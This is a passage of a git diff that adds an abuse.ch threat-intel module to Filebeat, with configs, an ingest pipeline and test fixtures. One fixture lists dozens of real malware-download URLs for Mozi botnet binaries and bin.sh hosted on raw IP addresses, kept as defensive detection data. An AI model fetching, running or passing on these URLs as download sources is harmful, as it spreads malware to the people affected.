"6144:0hlBeZgR9LqvgFcwNAwhGV52n5Dv4JdEqvQykqRqYdBx8pRA7OZJh:0h3eZgRQCcw+MN54dEq7kqRtoLZ/", + "threatintel.indicator.file.hash.tlsh": "1654CF22E642C926F1E900FCB2A98B4451257E355F40F4D777C40FABA835AE2AF27717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 284672, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:05:15.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 12544, + "related.hash": [ + "3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51", + "6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKS:W5MT4WNaHy9P1FjbrjlKS", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "3b9698b6c18bcba15ee33378440dd3f42509730e6b1d2d5832c71a74b1920e51", + "threatintel.indicator.file.hash.ssdeep": "6144:WlLMUG2gFWLDFO9vNa11y3NPcJufFFTXNZrjJTKS:W5MT4WNaHy9P1FjbrjlKS", + "threatintel.indicator.file.hash.tlsh": "5454CF217A53C826F5E800FCA6E9878925167F346F44A4C373D40F6AA8759E2DF2B317", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 280064, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:05:12.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 13113, + "related.hash": [ + "d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG8:X5DpBw/KViMTB1MnEWk0115Jr", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "d11edc90f0e879a175abc6e2ce5c94a263aa2a01cd3b6e8b9fdf93a51235ae99", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JG8:X5DpBw/KViMTB1MnEWk0115Jr", + "threatintel.indicator.file.hash.tlsh": "6044D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:04:38.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 13693, + "related.hash": [ + "8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa", + "6144:X1G3WVIOY6Bdjehj+qudd96ou/6mv5wdC:X1GmSafShjYdd96z/6cwdC", + "ed2860c18f5483e3b5388bad75169dc1" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "8cd28fed7ebdcd79ea2509dca84f0a727ca28d4eaaed5a92cd10b1279ff16afa", + "threatintel.indicator.file.hash.ssdeep": "6144:X1G3WVIOY6Bdjehj+qudd96ou/6mv5wdC:X1GmSafShjYdd96z/6cwdC", + "threatintel.indicator.file.hash.tlsh": "8D34BE41B28B8B4BD163163C2976D1F8953CFC909761CE693B64B22F0F739D0892E7A5", + "threatintel.indicator.file.pe.imphash": "ed2860c18f5483e3b5388bad75169dc1", + "threatintel.indicator.file.size": 241664, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:04:26.000Z", + "threatintel.indicator.type": "file" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abusemalware", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus-api.abuse.ch/v1/download/fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27/", + "event.type": "indicator", + "fileset.name": "abusemalware", + "input.type": "log", + "log.offset": 14256, + "related.hash": [ + "fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27", + "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGz:X5DpBw/KViMTB1MnEWk0115JU", + "68aea345b134d576ccdef7f06db86088" + ], + "service.type": "threatintel", + "tags": [ + "threatintel-abusemalware", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "fb25d13188a5d0913bbcf5aeff6c7e3208ad92a7d10ab6bed2735f4d43310a27", + "threatintel.indicator.file.hash.ssdeep": "6144:+60EDP6uCLfGw/GpxXinM1BCo1PlumGx2mx2tXd0t115JGz:X5DpBw/KViMTB1MnEWk0115JU", + "threatintel.indicator.file.hash.tlsh": "9244D022AD13DD37E1F400FCA6A58F8561626E381F00A89777D41F8A98356F1BB2B717", + "threatintel.indicator.file.pe.imphash": "68aea345b134d576ccdef7f06db86088", + "threatintel.indicator.file.size": 277504, + "threatintel.indicator.file.type": "dll", + "threatintel.indicator.first_seen": "2021-01-14T06:04:20.000Z", + "threatintel.indicator.type": "file" + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/threatintel/abuseurl/_meta/fields.yml b/x-pack/filebeat/module/threatintel/abuseurl/_meta/fields.yml new file mode 100644 index 000000000000..a93f91d339c1 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abuseurl/_meta/fields.yml @@ -0,0 +1,49 @@ +- name: abuseurl + type: group + description: > + Fields for AbuseCH Malware Threat Intel + fields: + - name: id + type: keyword + description: > + The ID of the url. + + - name: urlhaus_reference + type: keyword + description: > + Link to URLhaus entry. + + - name: url_status + type: keyword + description: > + The current status of the URL. Possible values are: online, offline and unknown. + + - name: threat + type: keyword + description: > + The threat corresponding to this malware URL. + + - name: blacklists.surbl + type: keyword + description: > + SURBL blacklist status. Possible values are: listed and not_listed + + - name: blacklists.spamhaus_dbl + type: keyword + description: > + Spamhaus DBL blacklist status. + + - name: reporter + type: keyword + description: > + The Twitter handle of the reporter that has reported this malware URL (or anonymous). + + - name: larted + type: boolean + description: > + Indicates whether the malware URL has been reported to the hosting provider (true or false) + + - name: tags + type: keyword + description: > + A list of tags associated with the queried malware URL diff --git a/x-pack/filebeat/module/threatintel/abuseurl/config/config.yml b/x-pack/filebeat/module/threatintel/abuseurl/config/config.yml new file mode 100644 index 000000000000..0ac7ef6c1432 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abuseurl/config/config.yml @@ -0,0 +1,42 @@ +{{ if eq .input "httpjson" }} + +type: httpjson +config_version: "2" +interval: {{ .interval }} + +request.method: GET +{{ if .ssl }} + - request.ssl: {{ .ssl | tojson }} +{{ end }} +request.url: {{ .url }} +request.transforms: +- set: + target: header.Content-Type + value: application/json + +response.split: + target: body.urls + +{{ else if eq .input "file" }} + +type: log +paths: +{{ range $i, $path := .paths }} + - {{$path}} +{{ end }} +exclude_files: [".gz$"] + +{{ end }} + +tags: {{.tags | tojson}} +publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} + +processors: + - decode_json_fields: + document_id: "id" + fields: [message] + target: json + - add_fields: + target: '' + fields: + ecs.version: 1.6.0 diff --git a/x-pack/filebeat/module/threatintel/abuseurl/ingest/pipeline.yml b/x-pack/filebeat/module/threatintel/abuseurl/ingest/pipeline.yml new file mode 100644 index 000000000000..ed2ebeda10de --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abuseurl/ingest/pipeline.yml @@ -0,0 +1,123 @@ +description: Pipeline for parsing Abuse.ch URL Threat Intel +processors: + +#################### +# Event ECS fields # +#################### +- set: + field: event.ingested + value: '{{_ingest.timestamp}}' +- set: + field: event.kind + value: enrichment +- set: + field: event.category + value: threat +- set: + field: event.type + value: indicator + +###################### +# General ECS fields # +###################### +- rename: + field: json + target_field: threatintel.abuseurl + ignore_missing: true + +##################### +# Threat ECS Fields # +##################### +- set: + field: threatintel.indicator.type + value: url +- set: + field: threatintel.indicator.url.scheme + value: https + if: ctx?.threatintel?.abuseurl?.url.startsWith('https:') +- set: + field: threatintel.indicator.url.scheme + value: http + if: ctx?.threatintel?.abuseurl?.url.startsWith('http:') +- date: + field: threatintel.abuseurl.date_added + target_field: threatintel.indicator.first_seen + formats: + - "yyyy-MM-dd HH:mm:ss z" + - "yyyy-MM-dd HH:mm:ss Z" + if: "ctx?.threatintel?.abuseurl?.date_added != null" +- uri_parts: + field: threatintel.abuseurl.url + target_field: threatintel.indicator.url + keep_original: true + remove_if_successful: true +- rename: + field: threatintel.abuseurl.url + target_field: threatintel.indicator.url.full + ignore_missing: true + if: ctx?.threatintel?.indicator?.url?.original == null && ctx?.threatintel?.abuseurl?.url != null +- rename: + field: threatintel.abuseurl.host + target_field: threatintel.indicator.domain + ignore_missing: true +- rename: + field: threatintel.abuseurl.urlhaus_reference + target_field: event.reference + ignore_missing: true + + +# Host can be both IP addresses and domain names +- grok: + field: threatintel.abuseurl.host + patterns: + - "(?:%{IP:threatintel.indicator.ip}|%{GREEDYDATA:threatintel.indicator.domain})" + ignore_failure: true +- rename: + field: threatintel.abuseurl.reporter + target_field: threatintel.indicator.provider + ignore_missing: true + +###################### +# Cleanup processors # +###################### +- set: + field: threatintel.indicator.type + value: unknown + if: ctx?.threatintel?.indicator?.type == null +- convert: + field: threatintel.abuseurl.larted + type: boolean + ignore_missing: true +- script: + lang: painless + if: ctx?.threatintel != null + source: | + void handleMap(Map map) { + for (def x : map.values()) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + map.values().removeIf(v -> v == null); + } + void handleList(List list) { + for (def x : list) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + } + handleMap(ctx); +- remove: + field: + - threatintel.abuseurl.date_added + - message + ignore_missing: true +on_failure: +- set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/x-pack/filebeat/module/threatintel/abuseurl/manifest.yml b/x-pack/filebeat/module/threatintel/abuseurl/manifest.yml new file mode 100644 index 000000000000..155e9b4ff3fa --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abuseurl/manifest.yml @@ -0,0 +1,16 @@ +module_version: 1.0 + +var: + - name: input + default: httpjson + - name: interval + default: 60m + - name: url + default: "https://urlhaus-api.abuse.ch/v1/urls/recent/" + - name: ssl + - name: tags + default: [threatintel-abuseurls, forwarded] + +ingest_pipeline: + - ingest/pipeline.yml +input: config/config.yml diff --git a/x-pack/filebeat/module/threatintel/abuseurl/test/abusechurl.ndjson.log b/x-pack/filebeat/module/threatintel/abuseurl/test/abusechurl.ndjson.log new file mode 100644 index 000000000000..e8099fa73aa6 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/abuseurl/test/abusechurl.ndjson.log @@ -0,0 +1,670 @@ +{"id":"961548","urlhaus_reference":"https://urlhaus.abuse.ch/url/961548/","url":"http://103.72.223.103:34613/Mozi.m","url_status":"online","host":"103.72.223.103","date_added":"2021-01-14 21:19:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961546","urlhaus_reference":"https://urlhaus.abuse.ch/url/961546/","url":"http://112.30.97.184:44941/Mozi.m","url_status":"online","host":"112.30.97.184","date_added":"2021-01-14 21:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961547","urlhaus_reference":"https://urlhaus.abuse.ch/url/961547/","url":"http://113.110.198.53:37173/Mozi.m","url_status":"online","host":"113.110.198.53","date_added":"2021-01-14 21:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961545","urlhaus_reference":"https://urlhaus.abuse.ch/url/961545/","url":"http://101.20.183.170:47545/Mozi.m","url_status":"online","host":"101.20.183.170","date_added":"2021-01-14 21:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961544","urlhaus_reference":"https://urlhaus.abuse.ch/url/961544/","url":"http://59.8.35.22:44782/Mozi.a","url_status":"online","host":"59.8.35.22","date_added":"2021-01-14 21:07:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961543","urlhaus_reference":"https://urlhaus.abuse.ch/url/961543/","url":"http://59.96.37.35:44359/Mozi.a","url_status":"online","host":"59.96.37.35","date_added":"2021-01-14 21:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961540","urlhaus_reference":"https://urlhaus.abuse.ch/url/961540/","url":"http://42.239.233.17:56507/Mozi.m","url_status":"online","host":"42.239.233.17","date_added":"2021-01-14 21:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961541","urlhaus_reference":"https://urlhaus.abuse.ch/url/961541/","url":"http://58.252.178.20:57562/Mozi.m","url_status":"online","host":"58.252.178.20","date_added":"2021-01-14 21:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961542","urlhaus_reference":"https://urlhaus.abuse.ch/url/961542/","url":"http://45.176.111.95:48845/Mozi.m","url_status":"online","host":"45.176.111.95","date_added":"2021-01-14 21:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961539","urlhaus_reference":"https://urlhaus.abuse.ch/url/961539/","url":"http://42.224.68.97:58245/Mozi.m","url_status":"online","host":"42.224.68.97","date_added":"2021-01-14 21:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961538","urlhaus_reference":"https://urlhaus.abuse.ch/url/961538/","url":"http://222.81.144.207:37198/Mozi.m","url_status":"online","host":"222.81.144.207","date_added":"2021-01-14 21:06:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961537","urlhaus_reference":"https://urlhaus.abuse.ch/url/961537/","url":"http://182.127.185.137:33524/Mozi.m","url_status":"online","host":"182.127.185.137","date_added":"2021-01-14 21:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961531","urlhaus_reference":"https://urlhaus.abuse.ch/url/961531/","url":"http://39.84.175.185:48261/Mozi.a","url_status":"online","host":"39.84.175.185","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961532","urlhaus_reference":"https://urlhaus.abuse.ch/url/961532/","url":"http://27.41.11.238:34478/Mozi.m","url_status":"online","host":"27.41.11.238","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961533","urlhaus_reference":"https://urlhaus.abuse.ch/url/961533/","url":"http://182.127.133.68:35703/Mozi.a","url_status":"online","host":"182.127.133.68","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961534","urlhaus_reference":"https://urlhaus.abuse.ch/url/961534/","url":"http://27.46.44.102:48666/Mozi.m","url_status":"online","host":"27.46.44.102","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961535","urlhaus_reference":"https://urlhaus.abuse.ch/url/961535/","url":"http://39.70.88.65:53923/Mozi.m","url_status":"online","host":"39.70.88.65","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961536","urlhaus_reference":"https://urlhaus.abuse.ch/url/961536/","url":"http://42.224.136.237:52794/Mozi.m","url_status":"online","host":"42.224.136.237","date_added":"2021-01-14 21:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961530","urlhaus_reference":"https://urlhaus.abuse.ch/url/961530/","url":"http://117.208.135.63:49312/Mozi.a","url_status":"offline","host":"117.208.135.63","date_added":"2021-01-14 21:05:34 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"false","tags":["elf","Mozi"]} +{"id":"961525","urlhaus_reference":"https://urlhaus.abuse.ch/url/961525/","url":"http://125.47.66.60:38961/Mozi.m","url_status":"online","host":"125.47.66.60","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961526","urlhaus_reference":"https://urlhaus.abuse.ch/url/961526/","url":"http://182.117.95.148:50420/Mozi.a","url_status":"online","host":"182.117.95.148","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961527","urlhaus_reference":"https://urlhaus.abuse.ch/url/961527/","url":"http://117.202.71.48:55007/Mozi.m","url_status":"online","host":"117.202.71.48","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961528","urlhaus_reference":"https://urlhaus.abuse.ch/url/961528/","url":"http://125.99.132.118:51143/Mozi.m","url_status":"online","host":"125.99.132.118","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961529","urlhaus_reference":"https://urlhaus.abuse.ch/url/961529/","url":"http://182.114.123.69:41003/Mozi.m","url_status":"online","host":"182.114.123.69","date_added":"2021-01-14 21:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961524","urlhaus_reference":"https://urlhaus.abuse.ch/url/961524/","url":"http://116.19.127.37:35739/Mozi.m","url_status":"offline","host":"116.19.127.37","date_added":"2021-01-14 21:04:38 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961523","urlhaus_reference":"https://urlhaus.abuse.ch/url/961523/","url":"http://42.239.253.55:45653/Mozi.m","url_status":"offline","host":"42.239.253.55","date_added":"2021-01-14 21:04:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961520","urlhaus_reference":"https://urlhaus.abuse.ch/url/961520/","url":"http://103.217.121.228:41349/Mozi.m","url_status":"offline","host":"103.217.121.228","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961521","urlhaus_reference":"https://urlhaus.abuse.ch/url/961521/","url":"http://111.92.81.255:48586/Mozi.m","url_status":"offline","host":"111.92.81.255","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961522","urlhaus_reference":"https://urlhaus.abuse.ch/url/961522/","url":"http://45.229.55.75:38111/Mozi.m","url_status":"offline","host":"45.229.55.75","date_added":"2021-01-14 21:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} +{"id":"961518","urlhaus_reference":"https://urlhaus.abuse.ch/url/961518/","url":"http://182.121.242.148:34556/Mozi.m","url_status":"online","host":"182.121.242.148","date_added":"2021-01-14 21:04:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961519","urlhaus_reference":"https://urlhaus.abuse.ch/url/961519/","url":"http://106.115.189.249:59815/Mozi.m","url_status":"online","host":"106.115.189.249","date_added":"2021-01-14 21:04:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961516","urlhaus_reference":"https://urlhaus.abuse.ch/url/961516/","url":"http://182.117.93.110:50587/bin.sh","url_status":"online","host":"182.117.93.110","date_added":"2021-01-14 21:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961517","urlhaus_reference":"https://urlhaus.abuse.ch/url/961517/","url":"http://110.251.5.169:48322/Mozi.m","url_status":"online","host":"110.251.5.169","date_added":"2021-01-14 21:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961515","urlhaus_reference":"https://urlhaus.abuse.ch/url/961515/","url":"http://101.51.117.186:33317/Mozi.m","url_status":"online","host":"101.51.117.186","date_added":"2021-01-14 21:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961513","urlhaus_reference":"https://urlhaus.abuse.ch/url/961513/","url":"http://121.151.78.166:41516/Mozi.m","url_status":"online","host":"121.151.78.166","date_added":"2021-01-14 21:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961514","urlhaus_reference":"https://urlhaus.abuse.ch/url/961514/","url":"http://116.72.92.97:57798/Mozi.m","url_status":"online","host":"116.72.92.97","date_added":"2021-01-14 21:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961509","urlhaus_reference":"https://urlhaus.abuse.ch/url/961509/","url":"http://27.218.15.209:47671/Mozi.m","url_status":"online","host":"27.218.15.209","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961510","urlhaus_reference":"https://urlhaus.abuse.ch/url/961510/","url":"http://120.85.171.210:57690/Mozi.m","url_status":"online","host":"120.85.171.210","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961511","urlhaus_reference":"https://urlhaus.abuse.ch/url/961511/","url":"http://117.251.59.53:50611/i","url_status":"online","host":"117.251.59.53","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961512","urlhaus_reference":"https://urlhaus.abuse.ch/url/961512/","url":"http://115.58.83.167:34141/Mozi.m","url_status":"online","host":"115.58.83.167","date_added":"2021-01-14 21:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} +{"id":"961507","urlhaus_reference":"https://urlhaus.abuse.ch/url/961507/","url":"http://94.178.124.83:44399/Mozi.m","url_status":"online","host":"94.178.124.83","date_added":"2021-01-14 20:52:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961508","urlhaus_reference":"https://urlhaus.abuse.ch/url/961508/","url":"http://182.122.75.232:49120/Mozi.m","url_status":"online","host":"182.122.75.232","date_added":"2021-01-14 20:52:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961506","urlhaus_reference":"https://urlhaus.abuse.ch/url/961506/","url":"http://115.63.202.43:51136/Mozi.m","url_status":"online","host":"115.63.202.43","date_added":"2021-01-14 20:52:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961504","urlhaus_reference":"https://urlhaus.abuse.ch/url/961504/","url":"http://59.99.40.204:45773/Mozi.m","url_status":"online","host":"59.99.40.204","date_added":"2021-01-14 20:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961505","urlhaus_reference":"https://urlhaus.abuse.ch/url/961505/","url":"http://117.247.128.213:56528/Mozi.m","url_status":"online","host":"117.247.128.213","date_added":"2021-01-14 20:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961500","urlhaus_reference":"https://urlhaus.abuse.ch/url/961500/","url":"http://14.137.219.132:44427/Mozi.a","url_status":"online","host":"14.137.219.132","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961501","urlhaus_reference":"https://urlhaus.abuse.ch/url/961501/","url":"http://42.224.40.14:36134/Mozi.m","url_status":"online","host":"42.224.40.14","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961502","urlhaus_reference":"https://urlhaus.abuse.ch/url/961502/","url":"http://186.33.104.107:43973/Mozi.m","url_status":"online","host":"186.33.104.107","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961503","urlhaus_reference":"https://urlhaus.abuse.ch/url/961503/","url":"http://85.105.16.154:41319/Mozi.m","url_status":"online","host":"85.105.16.154","date_added":"2021-01-14 20:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961496","urlhaus_reference":"https://urlhaus.abuse.ch/url/961496/","url":"http://178.141.73.115:51847/Mozi.a","url_status":"online","host":"178.141.73.115","date_added":"2021-01-14 20:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 